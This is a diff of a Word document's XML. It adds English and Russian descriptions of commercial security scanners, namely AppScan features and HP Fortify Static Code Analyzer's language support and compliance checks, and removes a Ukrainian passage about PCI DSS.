+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>allows users to focus on different client-side issues and DOM (document object model) based XSS problems.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="12"/>
+        </w:numPr>
+        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="360" w:right="360"/>
+        <w:textAlignment w:val="baseline"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>Reporting: Based on your requirements, you can generate reports in desired formats and include desired fields in it.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="12"/>
+        </w:numPr>
+        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="360" w:right="360"/>
+        <w:textAlignment w:val="baseline"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>Remediation support: For the identified vulnerabilities, the program provides a description of the issue along with the remediation notes.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="12"/>
+        </w:numPr>
+        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="360" w:right="360"/>
+        <w:textAlignment w:val="baseline"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="ru-RU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Customizable scanning policies: Appscan comes with a set of defined scanning policies. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>You can customize the policies to suit your needs.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="12"/>
+        </w:numPr>
+        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="360" w:right="360"/>
+        <w:textAlignment w:val="baseline"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>Tools support: It has tools like Authentication Tester, Token Analyzer, and HTTP Request Editor which comes in handy when testing for vulnerabilities manually.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="12"/>
+        </w:numPr>
+        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="360" w:right="360"/>
+        <w:textAlignment w:val="baseline"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>Support for Ajax and dojo frameworks.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="0" w:firstLine="348"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>HP Fortify Static Code Analyzer</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="0" w:firstLine="348"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">HP Fortify Static Code Analyzer </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>поддерживает</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>большое</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>число</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>языков</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>программирования</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>и</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>платформ</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>включая</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>веб</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>-</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>приложения</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>написанные</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>на</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> PHP, Python, Java/JSP, ASP.Net </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>и</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> JavaScript, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>и</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>встраиваемый</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>код</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>на</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>языках</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> ABAP (SAP), Action Script </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>и</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> VBScript.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>Из особенностей продукта стоит выделить наличие в HP Fortify Static Code Analyzer поддержки интеграции с различными системами управления разработкой и отслеживания ошибок. Если разработчик программного кода предоставляет заказчику доступ к прямой передаче сообщений об ошибках в Bugzilla, HP Quality Center или Microsoft TFS, анализатор может автоматически создавать сообщения об ошибках в этих системах без необходимости ручных действий. Работа продукта основана на собственных базах знаний HP Fortify, сформированных адаптацией базы CWE. В продукте реализован анализ на выполнение требований DISA STIG, FISMA, PCI DSS и рекомендаций OWASP.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:br/>
       </w:r>
       <w:bookmarkStart w:id="0" w:name="_GoBack"/>
       <w:bookmarkEnd w:id="0"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>руктури та інформаційної системи в тому випадку, якщо вимоги є обов'язковими. Наприклад, вимоги PCI DSS обов'язкові для веб-додатків і вбудованого коду, що працює з платіжною інформацією по банківських картах, при цьому проведення зовнішнього аудиту з виконання PCI DSS здійснюється в тому числі з аналізом застосовуваних програмних продукті</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>в</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:br/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:br w:type="page"/>
-      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -26927,19 +27808,6 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-          <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
     </w:p>
@@ -27069,6 +27937,155 @@
     </w:lvl>
   </w:abstractNum>
   <w:abstractNum w:abstractNumId="1">
+    <w:nsid w:val="162246DF"/>
+    <w:multiLevelType w:val="multilevel"/>
+    <w:tmpl w:val="21181962"/>
+    <w:lvl w:ilvl="0">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="720"/>
+        </w:tabs>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
